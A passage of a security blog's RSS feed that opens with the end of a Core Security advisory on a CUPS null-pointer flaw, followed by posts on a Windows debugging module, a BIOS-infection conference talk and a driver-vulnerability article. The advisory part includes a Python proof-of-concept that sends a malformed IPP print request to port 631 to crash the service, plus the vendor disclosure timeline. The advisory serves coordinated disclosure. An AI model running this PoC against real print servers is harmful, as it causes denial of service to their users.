        self.ipp_data =  "\x01\x00"           # version-number: 1.0
        self.ipp_data += "\x00\x02"           # operation-id: Print-job
        self.ipp_data += "\x00\x00\x00\x01"   # request-id: 1
        self.ipp_data += "\x01"               # operation-attributes-tag
        self.ipp_data += "\x0f\x0f"
        # self.ipp_data += operation_attr
        self.ipp_data += "\x02"               # job-attributes-tag
        self.ipp_data += "\x03"               # end-of-attributes-tag
        self.ipp_data += self.hpgl_data;
        return self.ipp_data

def main():

    try:
        printer = sys.argv[1]
        host = sys.argv[2]
    except:
        print "[+] Usage: exploit printer_name host"
        return 0

    data = "A"*100

    ipp = IppRequest(host,"80", printer, data)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    print "[+] Connecting to the host"
    s.connect((host, 631))

    #requests = ipp.get_http_request()
    #for each in requests:
    #    s.send(each)

    print "[+] Sending request"
    s.send(ipp.get_http_request())
    s.send("\r\n")

    print "[+] Sending ipp data"
    s.send(ipp.get_ipp_request())

    print "Response:%s" % s.recv(1024)
    print "done!"

if __name__ == "__main__":
    sys.exit(main())

- -----------/

9. <strong><span>*</span>Report Timeline<span>*</span></strong>

. 2009-04-28:
Core Security Technologies notifies the Apple Product Security Team of
the vulnerability and announces its initial plan to publish the advisory
on May 20th, 2009. Technical details and Proof of Concept (PoC) are sent
to Apple Security Team.

. 2009-04-28:
The vendor acknowledges reception of the technical report and PoC.

. 2009-05-11:
Core reminds Apple Security Team its initial plan to publish the
advisory on May 20th, and asks the confirmation that patches will be
released by then.

. 2009-05-12:
Core notifies Apple Security Team that this is a multi-vendor issue
(affecting, for example, multiple Linux distributions), and asks if the
patch process of the CUPS vulnerability will be coordinated using the
vendor-sec mailing list [2].

. 2009-05-12:
Apple Product Security Team notifies Core they will contact vendor-sec
about this issue very soon and proposes to reschedule the advisory
publication date to June 2nd. The vendor also notifies the issue was
addressed in Mac OS X 10.5.7 by updating CUPS to version 1.3.10.

. 2009-05-13:
Apple Product Security Team notifies the suggested fix would be to
update to CUPS 1.3.10.

. 2009-05-15:
The Red Hat Security Response Team informs (via vendor-sec) CUPS 1.1.17
is the oldest version they still ship and it is affected too. This issue
will probably affect even earlier CUPS versions too.

. 2009-05-25:
The Debian Team informs (via vendor-sec) there is a bug in the PoC
provided by Core. The advisory PoC is changed according to the comments
made by Debian Team.

. 2009-05-28:
Core notifies that the advisory is going to be released on June 2nd, and
requests a confirmation from Apple Security Team and vendor-sec
subscribers.

. 2009-05-29:
Apple Security Team, Red Hat Security Response Team and Debian Team
confirm the proposed release date. There was no request for embargo date
shift posted to vendor-sec.

. 2009-06-02:
The advisory CORE-2009-0420 is published.

10. <strong><span>*</span>References<span>*</span></strong>

[1] <a href="http://www.cups.org/">http://www.cups.org</a>.
[2] Vendor-sec, a mailing list dedicated to distributors of operating
systems using (but not necessarily solely comprised of) free and
open-source software.
<a href="http://oss-security.openwall.org/wiki/mailing-lists/vendor-sec">http://oss-security.openwall.org/wiki/mailing-lists/vendor-sec</a>.

11. <strong><span>*</span>About CoreLabs<span>*</span></strong>

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
<a href="http://www.coresecurity.com/corelabs">http://www.coresecurity.com/corelabs</a>.

12. <strong><span>*</span>About Core Security Technologies<span>*</span></strong>

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
<a href="http://www.coresecurity.com/">http://www.coresecurity.com</a>.

13. <strong><span>*</span>Disclaimer<span>*</span></strong>

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

14. <strong><span>*</span>PGP/GPG Keys<span>*</span></strong>

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
<a href="http://www.coresecurity.com/files/attachments/core_security_advisories.asc">http://www.coresecurity.com/files/attachments/core_security_advisories.asc</a>.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - <a href="http://enigmail.mozdev.org/">http://enigmail.mozdev.org</a>

iD8DBQFKJY7HyNibggitWa0RAtcuAJ9vxQ4OjXhyOepyzgUg8WvG8rCMlACgsUTK
A3cfFRppX8VCa6hzPcVEOiw=
=G46K
-----END PGP SIGNATURE-----</pre>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/103/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=103&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/06/03/apple-cups-ipp_tag_unsupported-handling-null-pointer-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://exploiting.files.wordpress.com/2009/06/applecups.jpg" medium="image">
			<media:title type="html">AppleCups</media:title>
		</media:content>
	</item>
		<item>
		<title>Python winappdbg 1.0 is Out!</title>
		<link>http://exploiting.wordpress.com/2009/04/22/python-winappdbg-10-is-out/</link>
		<comments>http://exploiting.wordpress.com/2009/04/22/python-winappdbg-10-is-out/#comments</comments>
		<pubDate>Wed, 22 Apr 2009 17:04:20 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Main()]]></category>
		<category><![CDATA[ctypes]]></category>
		<category><![CDATA[debugger]]></category>
		<category><![CDATA[fuzzing]]></category>
		<category><![CDATA[win32]]></category>
		<category><![CDATA[winappdbg]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=99</guid>
		<description><![CDATA[the_excerpt()<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=99&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div class="wp-caption aligncenter" style="width: 495px"><a href="http://breakingcode.wordpress.com/"><img title="HotFuzz" src="http://www.gnucitizen.org/images/2007_hot_fuzz_wallpaper_002.jpg" alt="HotFuzz" width="485" height="303" /></a><p class="wp-caption-text">HotFuzz</p></div>
<p>Mario Vilas, a very good friend of mine (and coworker) has released a very cool python module that allows developers to quickly code instrumentation scripts in Python under a Windows environment.</p>
<p>I&#8217;ve been folowing this project very close, testing some pre-releases,  and i must say that i cant wait to fuzz some stuff with this final version.</p>
<p><span id="more-99"></span>Mario says about it:</p>
<p>&#8220;The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes.</p>
<p>Current features also include disassembling x86 native code (using the open source <a href="http://ragestorm.net/distorm/">diStorm project</a>), debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing.&#8221;</p>
<p>You can see the mario&#8217;s original post <a href="http://breakingcode.wordpress.com/2009/04/21/python-winappdbg-module-v10-is-out/" target="_blank">here</a>.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/99/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/99/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/99/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=99&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/04/22/python-winappdbg-10-is-out/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://www.gnucitizen.org/images/2007_hot_fuzz_wallpaper_002.jpg" medium="image">
			<media:title type="html">HotFuzz</media:title>
		</media:content>
	</item>
		<item>
		<title>CanSecWest was great!. Here, the presentation slides.</title>
		<link>http://exploiting.wordpress.com/2009/03/23/cansecwest-was-great-here-the-presentation-slides/</link>
		<comments>http://exploiting.wordpress.com/2009/03/23/cansecwest-was-great-here-the-presentation-slides/#comments</comments>
		<pubDate>Mon, 23 Mar 2009 12:04:54 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Main()]]></category>
		<category><![CDATA[bios rootkit]]></category>
		<category><![CDATA[cansecwest]]></category>
		<category><![CDATA[no more free bugs]]></category>
		<category><![CDATA[persistent bios infeccion]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=79</guid>
		<description><![CDATA[the_excerpt()<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=79&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Ok, so, CanSecWest has finished. And i must say, It was an excellent conference.</p>
<p style="text-align:center;"><img class="aligncenter" src="http://farm4.static.flickr.com/3621/3366177651_a3f9209d06.jpg?v=0" alt="CanSecWest Banner" width="325" height="500" /></p>
<p>We &#8216;ve talked on the second day and, although it was very early, there was a lot of -amazingly not drunk- people there.</p>
<p><span id="more-79"></span></p>
<p>I&#8217;ve met *a lot* of interesting people there and we had so much fun at the Vancouver&#8217;s nights.<br />
After the second day, Dragos has given an awesome party on the top of Grouse Mountain, that is a very cool place.</p>
<p>BTW, this place is excelent. The ppl at vancouver is very kind and open minded. I really hope to come back here the next year.</p>
<p>The slides are available <a href="http://corelabs.coresecurity.com/attachment.php?type=researcher&amp;page=Anibal_Sacco&amp;file=publication%2FPersistent_BIOS_Infection%2FPersistent_BIOS_Infection.pdf">here</a></p>
<p>A few reporters covered the talk, here are the links:</p>
<p><a href="http://www.securityfocus.com/brief/929">SecurityFocus</a><br />
<a href="http://blogs.zdnet.com/security/?p=2962">ZDNet</a><br />
<a href="http://www.threatpost.com/blogs/researchers-unveil-persistent-bios-attack-methods?page=1">Threat Post</a><br />
<a href="http://www.enterprise-security-today.com/story.xhtml?story_id=65311">CORE&#8217;s Press Release</a><br />
<a href="http://www.informationweek.com/blog/main/archives/2009/03/serious_stealth.html">Informationweek</a></p>
<p>And also on <a href="http://slashdot.org/article.pl?sid=09/03/23/1248214">Slashdot</a></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/79/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=79&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/03/23/cansecwest-was-great-here-the-presentation-slides/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://farm4.static.flickr.com/3621/3366177651_a3f9209d06.jpg?v=0" medium="image">
			<media:title type="html">CanSecWest Banner</media:title>
		</media:content>
	</item>
		<item>
		<title>Persistent BIOS Infection &#8211; CanSecWest</title>
		<link>http://exploiting.wordpress.com/2009/02/02/persistent-bios-infection-cansecwest/</link>
		<comments>http://exploiting.wordpress.com/2009/02/02/persistent-bios-infection-cansecwest/#comments</comments>
		<pubDate>Mon, 02 Feb 2009 03:19:56 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Main()]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=66</guid>
		<description><![CDATA[the_excerpt()<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=66&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>After some time without news -as is usual around here- im back again, ready to say that i was confirmed as speaker at the CanSecWest conference that will be held March 16-20, at Vancouver, BC. </p>
<p>We will give a talk about a project what we&#8217;ve been working on with Alfredo Ortega (you know, the OpenBSD guy <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ) about a new generic binary method to get malicious code injected and executed into the computer BIOS. Yeah, that cute little chip&#8230;</p>
<p>I will post more details about the conference in some time. In the meanwhile, you can get more info at the <a href="http://cansecwest.com/">CanSecWest website.</a></p>
<p>For those who are planning to attend the conference, we (Alfred &amp; I) will be arriving 16/3, and of course, we are up for some beers. </p>
<p><span id="more-66"></span></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/66/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/66/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/66/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/66/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/66/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/66/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=66&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2009/02/02/persistent-bios-infection-cansecwest/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>
	</item>
		<item>
		<title>My article at (IN)SECURE Magazine</title>
		<link>http://exploiting.wordpress.com/2008/10/05/my-article-at-insecure-magazine/</link>
		<comments>http://exploiting.wordpress.com/2008/10/05/my-article-at-insecure-magazine/#comments</comments>
		<pubDate>Sun, 05 Oct 2008 20:54:01 +0000</pubDate>
		<dc:creator>aLS --</dc:creator>
				<category><![CDATA[Main()]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[article]]></category>
		<category><![CDATA[driver vulnerabilties]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[insecure magazine]]></category>
		<category><![CDATA[METHOD_NEITHER]]></category>
		<category><![CDATA[privilege escalation]]></category>

		<guid isPermaLink="false">http://exploiting.wordpress.com/?p=39</guid>
		<description><![CDATA[the_excerpt()<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=39&subd=exploiting&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Hey all. I&#8217;ve written an article called &#8220;The METHOD_NEITHER Odyssey&#8221; for the latest issue of the (IN)SECURE Magazine and you can download it <a href="http://www.net-security.org/insecuremag.php">here</a>.</p>
<div id="attachment_52" class="wp-caption aligncenter" style="width: 198px"><a href="http://www.net-security.org/insecuremag.php"><img class="size-full wp-image-52" title="snapshot-2008-09-30-05-08-031" src="http://exploiting.files.wordpress.com/2008/10/snapshot-2008-09-30-05-08-031.jpg?w=188&#038;h=264" alt="(IN)SECURE Magazine Nr. 18" width="188" height="264" /></a><p class="wp-caption-text">(IN)SECURE Magazine Nr. 18</p></div>
<p><span id="more-39"></span></p>
<p>In the article, i tried to introduce the readers to the windows kernel vulnerabilities world showing them a very common kind of driver vulnerabilities -of which i&#8217;ve talked here a few posts ago, and developed an IDA plugin to find them- using a real-case as example, the Winpcap 4.x driver vulnerability, and showing how this could be exploited.</p>
<p>Also, i recommend you to take a look to the other articles, my favorites were:</p>
<p>- Removing software armoring from executables<br />
- Insecurities in privacy protection software</p>
<p>You can see an online version of the issue <a href="http://issuu.com/insecure/docs/insecure-18">here</a>.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/exploiting.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/exploiting.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/exploiting.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/exploiting.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/exploiting.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/exploiting.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/exploiting.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/exploiting.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/exploiting.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/exploiting.wordpress.com/39/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=exploiting.wordpress.com&blog=758918&post=39&subd=exploiting&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://exploiting.wordpress.com/2008/10/05/my-article-at-insecure-magazine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5e963b441a73812620a82d6b092fc46?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aLS</media:title>
		</media:content>

		<media:content url="http://exploiting.files.wordpress.com/2008/10/snapshot-2008-09-30-05-08-031.jpg" medium="image">
			<media:title type="html">snapshot-2008-09-30-05-08-031</media:title>
		</media:content>
	</item>
	</channel>
</rss>